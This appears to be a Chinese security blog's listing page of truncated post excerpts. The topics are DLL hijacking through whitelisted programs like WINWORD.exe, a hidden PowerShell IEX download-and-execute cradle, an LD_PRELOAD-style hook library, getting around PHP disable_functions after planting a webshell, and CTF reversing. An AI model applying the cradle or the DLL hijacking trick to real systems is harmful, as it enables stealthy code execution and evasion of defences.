DLL劫持的白利用加载
学到了一个新的技巧。和lpk.dll类似,有些文件会自动加载目录下面的dll。并且这些文件是经过授权且加入白名单的程序。例如WINWORD.exe。其他的待收集,只是记录一下
学到了一个新的技巧。和lpk.dll类似,有些文件会自动加载目录下面的dll。并且这些文件是经过授权且加入白名单的程序。例如WINWORD.exe。其他的待收集,只是记录一下
最基础的就是windows自带服务例如RDP。telnet。等等之后再比如powershell:powershell.exe -nop -whidden -c IEX ((new-objectn...
详情看上一篇方法,突然想到一个神奇的用法。/* how to use: gcc -fpic -c -ldl hook.c gcc -shared -lc -o hook.so h...
当你插入webshell的时候,就会遇上这个问题,php.ini中,把能执行命令的函数(例如system)等,都禁掉了怎么办呢?这时候,就可以参考之前那个新坑预定:linux下的进程/文件隐藏中...
起因在隔壁院的新生群里玩耍,正好听说有个专用程序,同时还有一天就开学了(其实是因为要补考,我实在复习不进去那什么中国音乐史,外国音乐史很好,程序到手,分析一波走起预计在MSGBOX那里有网络通信...
开新坑,随手做一做。welcome二话不说,掏出IDA很明显,需要把*address地址改成0,则可以获取flag。这时候,看伪代码其实不好看,得看汇编看到这一行,rdx是可控的,也就是我们输入...